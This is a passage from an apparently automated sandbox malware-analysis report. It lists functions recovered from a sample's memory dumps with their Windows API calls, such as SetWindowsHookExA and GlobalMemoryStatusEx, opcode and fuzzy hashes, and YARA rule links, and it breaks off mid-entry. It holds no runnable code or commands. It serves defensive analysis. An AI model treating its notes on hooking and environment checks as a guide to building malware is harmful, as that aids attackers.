                                                                    • Opcode ID: 7607df27cea424d460ba34e313f4671946596216b2d029882ebe3d3b219578f6
                                                                    • Instruction ID: 491cc4b3b1b874bd8259db81dce0220c16604dd735f8f83dff1e00579ac02ae5
                                                                    • Opcode Fuzzy Hash: 7607df27cea424d460ba34e313f4671946596216b2d029882ebe3d3b219578f6
                                                                    • Instruction Fuzzy Hash: F721E2B5D002099FCB54DF9AD844BEEFBF9FB88310F10842AE519A7250C775AA45CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD9A10 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06CD9A8B
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0
                                                                    • Opcode ID: 61dbd580d9ecd3786ca46930c7f163833e54b8272115756e9b4a4d569a0769fe
                                                                    • Instruction ID: 60429f459d1bc691fcaab79fb9230f2e2fce3512074b5c023079240bc85f44a1
                                                                    • Opcode Fuzzy Hash: 61dbd580d9ecd3786ca46930c7f163833e54b8272115756e9b4a4d569a0769fe
                                                                    • Instruction Fuzzy Hash: 1121E2B5D002099FCB54DF9AC844BEEFBF5FB88310F10842AE519A7250C775AA45CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0304EA60 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNELBASE ref: 0304EAC7
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4525926697.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_3040000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID:
                                                                    • API String ID: 1890195054-0
                                                                    • Opcode ID: 317a0dca76bd3e9d7afa39a025b65c9e14cb6b92bc25b0a38e647462e7d0719c
                                                                    • Instruction ID: 75638c57ee347bafa3f77dd2267c635a04468b96bf1ad74e543a58ceee32b83f
                                                                    • Opcode Fuzzy Hash: 317a0dca76bd3e9d7afa39a025b65c9e14cb6b92bc25b0a38e647462e7d0719c
                                                                    • Instruction Fuzzy Hash: B511E2B1C006599BCB10DF9AC544AAEFBF5FF48320F14816AD818A7240D778A954CFE5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD14EB Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06CD1556
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 13b6087fa5097c889617942b5c52e615bd2ac0ee1f770a21ca6fb2f6bcb47660
                                                                    • Instruction ID: d6635ebfbf01c02a416084561dbf04a72bb4fafe76ad77a42370bcc78dcd060f
                                                                    • Opcode Fuzzy Hash: 13b6087fa5097c889617942b5c52e615bd2ac0ee1f770a21ca6fb2f6bcb47660
                                                                    • Instruction Fuzzy Hash: 5B110FB6D002498FDB10DF9AD944BEEFBF4AF48220F14845AD529B7610D378A645CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD14F0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06CD1556
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: e6f735535c953f678eea8d2ca8c3ff55a303262c0e23b974bc24f3ddb18a470e
                                                                    • Instruction ID: d1958c1886df93b2e3ba9a2f404f22634dc8dc2490c2a3ff53d4827cf810efa7
                                                                    • Opcode Fuzzy Hash: e6f735535c953f678eea8d2ca8c3ff55a303262c0e23b974bc24f3ddb18a470e
                                                                    • Instruction Fuzzy Hash: 241110B6D002498FDB10DF9AD444ADEFBF8EF88320F14845AD529B7600D379A645CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD608C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 06CD7DDD
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize
                                                                    • String ID:
                                                                    • API String ID: 2538663250-0
                                                                    • Opcode ID: de40ed4143cff9027dd9e82caca1d55fc69c01a083322c727c9877e8a3ffe6c7
                                                                    • Instruction ID: 50659ba110a555b09325405e3764df1c59a1459abdd37662021986cbaf1cc124
                                                                    • Opcode Fuzzy Hash: de40ed4143cff9027dd9e82caca1d55fc69c01a083322c727c9877e8a3ffe6c7
                                                                    • Instruction Fuzzy Hash: C71115B19003498FDB20DF9AD544BEEFBF8EB48320F208459D518A7300D378A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD5F34 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06CD7495), ref: 06CD751F
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 87840b33030d910d748e7048044f9f78f5236cd0f752f65591ed8f143ebeb83d
                                                                    • Instruction ID: aa0df1033b4c9c14661f4184a27e3378a384f5ba3ba732b12acb19349cc63356
                                                                    • Opcode Fuzzy Hash: 87840b33030d910d748e7048044f9f78f5236cd0f752f65591ed8f143ebeb83d
                                                                    • Instruction Fuzzy Hash: 041103B18002498FCB10DF9AD444BAEFBF8EB48324F20845AD519A7350D378A944CFE5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD74B8 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06CD7495), ref: 06CD751F
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 1bd4d5ed544387a946806eb6be6ab76fcc70f039d3aa8a662fdee949b65c1cef
                                                                    • Instruction ID: 63ff97bda2f1820e86eadc38fa391d998bb16734d1c515e0b8c82ea9c57df410
                                                                    • Opcode Fuzzy Hash: 1bd4d5ed544387a946806eb6be6ab76fcc70f039d3aa8a662fdee949b65c1cef
                                                                    • Instruction Fuzzy Hash: BC1100B18002498FCB20DF9AD844B9EFBF8EF49320F20845AD518A3350D778A944CFA6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD7D81 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 06CD7DDD
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize
                                                                    • String ID:
                                                                    • API String ID: 2538663250-0
                                                                    • Opcode ID: cd27a0d3aa59436203d702a133f2b1dfbf427b910a4c6d2a926ef75795ec084c
                                                                    • Instruction ID: 74e324e9fe1ce8567248dc974c7df276c2385c6a5b147ac33cfc0fc41d65bd56
                                                                    • Opcode Fuzzy Hash: cd27a0d3aa59436203d702a133f2b1dfbf427b910a4c6d2a926ef75795ec084c
                                                                    • Instruction Fuzzy Hash: 8E1103B59002498FDB20DF9AD548BEEFBF5EB48324F24845AE518A3200C378A544CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CEDAB0 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PH]q
                                                                    • API String ID: 0-3168235125
                                                                    • Opcode ID: 627a9bdd6a91afffaae1f581f135587e390a2f97a8d3c9774f75926992d42668
                                                                    • Instruction ID: 9855d639f2705184d5186495e5527b5e74564c74cf63fa734b96281445b2fb1f
                                                                    • Opcode Fuzzy Hash: 627a9bdd6a91afffaae1f581f135587e390a2f97a8d3c9774f75926992d42668
                                                                    • Instruction Fuzzy Hash: F341A230E1030ADFDB54DFA5D49469EBBB6FF85340F248829D806DB240EB74EA46CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CEDA9D Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PH]q
                                                                    • API String ID: 0-3168235125
                                                                    • Opcode ID: c102a97ae4a1defc6d9fc4e78fcc83cf9d8ed4b481ef4673ae5500224a4734eb
                                                                    • Instruction ID: 557d6e7a6d22fa309e455f5883ffb3212c8945e474997dbffd12e2d9382b80af
                                                                    • Opcode Fuzzy Hash: c102a97ae4a1defc6d9fc4e78fcc83cf9d8ed4b481ef4673ae5500224a4734eb
                                                                    • Instruction Fuzzy Hash: 8D41A030E10306DFDB55DFA5D59069EBBB2FF85340F148929D806DB240EB70E946CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE21B5 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PH]q
                                                                    • API String ID: 0-3168235125
                                                                    • Opcode ID: d002fd82abc755eb8dd73165830ca01c652ebac5eae6bd12baad93ec496cd846
                                                                    • Instruction ID: 9e0c8b6053b5ac255f71e8a09c264e54b5a586c79eeac2b8d8d06fa9169fe393
                                                                    • Opcode Fuzzy Hash: d002fd82abc755eb8dd73165830ca01c652ebac5eae6bd12baad93ec496cd846
                                                                    • Instruction Fuzzy Hash: 3131ED30B102029FDB499B74D52876E7BFBAB89210F148828D406DB394DF39DE46CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE21C8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PH]q
                                                                    • API String ID: 0-3168235125
                                                                    • Opcode ID: ac6cee23d8468c4ad2bccea44a0ae5d8efdd02768c15b96e84310579d8e39352
                                                                    • Instruction ID: 12a4cd26d369d9390a40247b62f48acbf5c1d15986352a1328648da4423c518e
                                                                    • Opcode Fuzzy Hash: ac6cee23d8468c4ad2bccea44a0ae5d8efdd02768c15b96e84310579d8e39352
                                                                    • Instruction Fuzzy Hash: 2C31DE30B102069FDB489B74D42866E7BFABF89210F14883CC406DB394DE39DE46CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE82D6 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q
                                                                    • API String ID: 0-1007455737
                                                                    • Opcode ID: 5e3c1a7b76684ab888d9f44cdce52d10e166bad99c0ce7da3684546695e26f64
                                                                    • Instruction ID: 515c7dc447013855ed29502802eca78b6b46dbc35d4124ebf511a9f0e29d8a2e
                                                                    • Opcode Fuzzy Hash: 5e3c1a7b76684ab888d9f44cdce52d10e166bad99c0ce7da3684546695e26f64
                                                                    • Instruction Fuzzy Hash: D6F0ED32B02211CFEFA84ECAF8841B8B7B0EB40221F14406ACE01D7191D334EF42C7A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE61C0 Relevance: .2, Instructions: 229COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6acc5facd8edbd84884164f4ec5bddc2c0473247edb614f24dcab1b20c9e1abf
                                                                    • Instruction ID: 2d43a9107a82a07d63888d411746d0b49de1a49cc135eba5ae47ac9ffa28ae88
                                                                    • Opcode Fuzzy Hash: 6acc5facd8edbd84884164f4ec5bddc2c0473247edb614f24dcab1b20c9e1abf
                                                                    • Instruction Fuzzy Hash: 4361CF71F100214FDB549A7EC88465FBAEAAFE4220F154479D80EDB360DE69DD0287D2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE42B1 Relevance: .2, Instructions: 225COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4f6f44acab6ed3321754c5f0390b79e7dd191e5d1e247a9fc9c2d2656b213c75
                                                                    • Instruction ID: 18b9fb1db24ad28ec0ab99c2350c07dfa01f6241defcbe373db23a8806346a75
                                                                    • Opcode Fuzzy Hash: 4f6f44acab6ed3321754c5f0390b79e7dd191e5d1e247a9fc9c2d2656b213c75
                                                                    • Instruction Fuzzy Hash: 22813F30B0020A9FDB58DFA9D4546AEB7F2EF89704F108529D409DB394DF35ED468B92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE42C0 Relevance: .2, Instructions: 218COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fc3133f43729d08dc71a91469946a28ecf67ff02b7bbd542b88b197f73434589
                                                                    • Instruction ID: 3f60417e360992248b3873d197ee98d44eda244fbbf24b04f513778d8bb7db86
                                                                    • Opcode Fuzzy Hash: fc3133f43729d08dc71a91469946a28ecf67ff02b7bbd542b88b197f73434589
                                                                    • Instruction Fuzzy Hash: 8F811C30B0020A9FDB58DFA9D4546AEB7F2EF89704F108529D40ADB394DF35ED468B92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE45CC Relevance: .2, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2faff51c594134a9e0c3114bb75606c982374ad5aa934b79e8c1a79d81b601ac
                                                                    • Instruction ID: 2b684a780507e1ccdf2821a5ca0255f18c9bcd7c37d8c0c2272e86d840880b1f
                                                                    • Opcode Fuzzy Hash: 2faff51c594134a9e0c3114bb75606c982374ad5aa934b79e8c1a79d81b601ac
                                                                    • Instruction Fuzzy Hash: B6914E30E1021A8FDF64DF68C850B9DB7B1FF89300F20C699D549AB295DB70AA85CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CEAF08 Relevance: .2, Instructions: 215COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e8df44c9204e39aa8e7d5fd4ce22d50146d1511c18fc659dfe00b1da5b0a53bf
                                                                    • Instruction ID: 9f0b1098450e02919f0bc2caca5b624ba7c41e15c2d377b3705ad3767699e3c0
                                                                    • Opcode Fuzzy Hash: e8df44c9204e39aa8e7d5fd4ce22d50146d1511c18fc659dfe00b1da5b0a53bf
                                                                    • Instruction Fuzzy Hash: 07716C30E1031A8FCB69DFA9D5906AEB7B2FF85304F108529D409AB394DB74ED46CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE45E0 Relevance: .2, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6b7dec28a4e60abc3a3dc6c075d85ecb83e452672b7cdf271f5e481127d2ed11
                                                                    • Instruction ID: b7c5f15859bffb42910958e28cc3b4950ee3342dfa67e695744673f51bb34132
                                                                    • Opcode Fuzzy Hash: 6b7dec28a4e60abc3a3dc6c075d85ecb83e452672b7cdf271f5e481127d2ed11
                                                                    • Instruction Fuzzy Hash: 77913D30E1061A8BDF64DF68C890B9DB7B1FF89300F20C599D549BB295DB70AA85CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CEEAE8 Relevance: .2, Instructions: 204COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: de0998c4fae00f3c55c032592936d4176537413245668dd3a05ee54485b8eebb
                                                                    • Instruction ID: 14021e798e8779eb9c79dda1781b33631eba7caea7729461b24192596d6600c7
                                                                    • Opcode Fuzzy Hash: de0998c4fae00f3c55c032592936d4176537413245668dd3a05ee54485b8eebb
                                                                    • Instruction Fuzzy Hash: 62711770B012099FDB54DFA9D990A9DBBF6FF88340F248429D009AB365DB30ED46CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CEEAF8 Relevance: .2, Instructions: 201COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e216e773947b398ced5e6edcca9cd3ccdd41d22c207f137dc0a589f21b28ca3b
                                                                    • Instruction ID: f0670729bc62ee1136496d0351f15bf2160d711ad105d4678187092bf93bfd08
                                                                    • Opcode Fuzzy Hash: e216e773947b398ced5e6edcca9cd3ccdd41d22c207f137dc0a589f21b28ca3b
                                                                    • Instruction Fuzzy Hash: F1710770B012099FDB54EFA9D990A9DBBF6FF88340F248469D009AB365DB34ED46CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CEFB87 Relevance: .2, Instructions: 176COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9899814ac0e291cc84aeaf3e72a02e0c66d93146462dd56123318cf2b9d96b9c
                                                                    • Instruction ID: 68e543cc4b99853eaf5dd5c5a9c5968b33ae9d03f4a3303280cc1eba58e37b8b
                                                                    • Opcode Fuzzy Hash: 9899814ac0e291cc84aeaf3e72a02e0c66d93146462dd56123318cf2b9d96b9c
                                                                    • Instruction Fuzzy Hash: EA51C075F01109DFCB54EFB8E8586ADBBB2FB84311F20886DD12ADB250DB358A55CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CEF939 Relevance: .2, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 64d43b3ae4fc4a1a69194f4f3e5c0214f1cbcf78b69830a085c3f2f5a97d482a
                                                                    • Instruction ID: 5477f8828c2b3afce25139dd7809a4e406b2e89f474ad85b7927b2f33c49d653
                                                                    • Opcode Fuzzy Hash: 64d43b3ae4fc4a1a69194f4f3e5c0214f1cbcf78b69830a085c3f2f5a97d482a
                                                                    • Instruction Fuzzy Hash: C551C970B102049FEF649A6CE95872F26AEDB89710F20482DE51AC73D6C96DCD858792
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CEF948 Relevance: .2, Instructions: 163COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8e6e553ba1bf67fd1c2a032999c09314f6b60131e9124a3bc4d9ecbd5d8a1459
                                                                    • Instruction ID: 49482c95d60d5196f86e50b1cd21921050a8c6569743e4d2e9ae2864881d2724
                                                                    • Opcode Fuzzy Hash: 8e6e553ba1bf67fd1c2a032999c09314f6b60131e9124a3bc4d9ecbd5d8a1459
                                                                    • Instruction Fuzzy Hash: E851D870F102049FEF645A6CE95872F26AEDB89310F20482DE51BC73E6CD2CCD8583A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE5430 Relevance: .1, Instructions: 126COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 75c4128228c58c337007c9ece096c5c753512254e2f3d6249da007612c9caa77
                                                                    • Instruction ID: 00119f6a958d304e3258121f0a68710289385dbb3d10a1202434d896ad91df1d
                                                                    • Opcode Fuzzy Hash: 75c4128228c58c337007c9ece096c5c753512254e2f3d6249da007612c9caa77
                                                                    • Instruction Fuzzy Hash: 92417C71E006098FDF70CEA9D8C0AAFF7B2FB84314F50492AE21AD7650D732E9558B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE2078 Relevance: .1, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 806fb245a73962b021d922611c77e97c2ae1592787d36308e3c58b5d58f66d5a
                                                                    • Instruction ID: 7b1a2c33948e5af013df3a157a89e378daa4036beefbe82ef60918fdc9c19870
                                                                    • Opcode Fuzzy Hash: 806fb245a73962b021d922611c77e97c2ae1592787d36308e3c58b5d58f66d5a
                                                                    • Instruction Fuzzy Hash: A1318175E102068FDB19CFA4D85579EBBB6AF89300F10C529E806EB750DB75DE42CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE2088 Relevance: .1, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e97e2f9882b0a9283a673ff7eea04701d73bfc3858280be0f3525d6029953372
                                                                    • Instruction ID: fe772b1f859bf240e288185af17d9d38126ee49d7cac141e5cbc95b836d60579
                                                                    • Opcode Fuzzy Hash: e97e2f9882b0a9283a673ff7eea04701d73bfc3858280be0f3525d6029953372
